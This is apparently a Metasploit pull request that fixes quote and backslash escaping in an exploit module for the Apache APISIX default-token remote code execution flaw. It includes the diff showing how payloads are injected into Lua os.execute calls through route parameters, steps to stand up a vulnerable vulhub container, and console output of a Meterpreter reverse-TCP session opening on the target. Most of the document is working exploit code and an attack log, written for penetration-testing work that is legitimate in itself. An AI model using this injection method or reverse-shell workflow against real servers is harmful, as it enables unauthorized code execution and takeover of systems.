### PR TITLE
Fix character escaping in the apisix exploit

### DIFF
--- a/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
+++ b/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
@@ -190,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def add_route
     # This method use the script parameter to execute the payload
-    stub = "os.execute('PAYLOAD');".gsub('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
+    stub = "os.execute('#{payload.encoded.gsub(/(['\\])/, '\\\\\\1')}');"
     # binding.pry
     data = base_data.merge({
       'script' => stub
@@ -217,7 +217,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def filter_func_exec
     # This method use the filter_func parameter to execute the payload
-    stub = "function(vars) os.execute('PAYLOAD'); return true end".gsub('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
+    stub = "function(vars) os.execute('#{payload.encoded.gsub(/(['\\])/, '\\\\\\1')}'); return true end"
 
     data = base_data.merge({
       'uri' => @payload_uri,

--- a/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
+++ b/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
@@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Deleting route #{@payload_uri}")
     # remove the route
     res = batch_request(batch_body(pipeline))
-    vprint_error('Unable to delete the route') unless res.code == 200
+    vprint_error('Unable to delete the route') unless res&.code == 200
   end
 
   def apisix_request(params = {})
@@ -262,6 +262,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST'
     })
 
+    fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
     return false if res.code == 404
 
     true


### PR DESCRIPTION
While recording a demo for the APISIX RCE exploit I noticed that it wasn't working with the latest `cmd/unix/python/meterpreter/reverse_tcp` payload because it was only escaping single quotes and not backslashes. This PR fixes that issue so that both characters are properly escaped for insertion into the Lua harness.



## Verification

List the steps needed to make sure this thing works

- [x] Setup the target
    - [x] Git clone the vulhub repo: `git clone git@github.com:vulhub/vulhub.git` and navigate into `apisix/CVE-2020-13945`
    - [x] Run `docker-compose up` to start the vulnerable service
- [x] Start `msfconsole` and `use exploit/multi/http/apache_apisix_api_default_token_rce`
- [x] Set the payload to `cmd/unix/python/meterpreter/reverse_tcp` which needs the additional characters to be escaped
- [x] Set the RPORT to 9080 which is where docker runs it
- [x] Run the exploit and get a session

## Example Output

```
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking component version to 192.168.159.128:9080
[+] The target appears to be vulnerable.
[*] Sending stage (39920 bytes) to 172.19.0.3
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.19.0.3:60198 ) at 2022-03-21 15:06:33 -0400

meterpreter > getuid
Server username: nobody
meterpreter > 
```
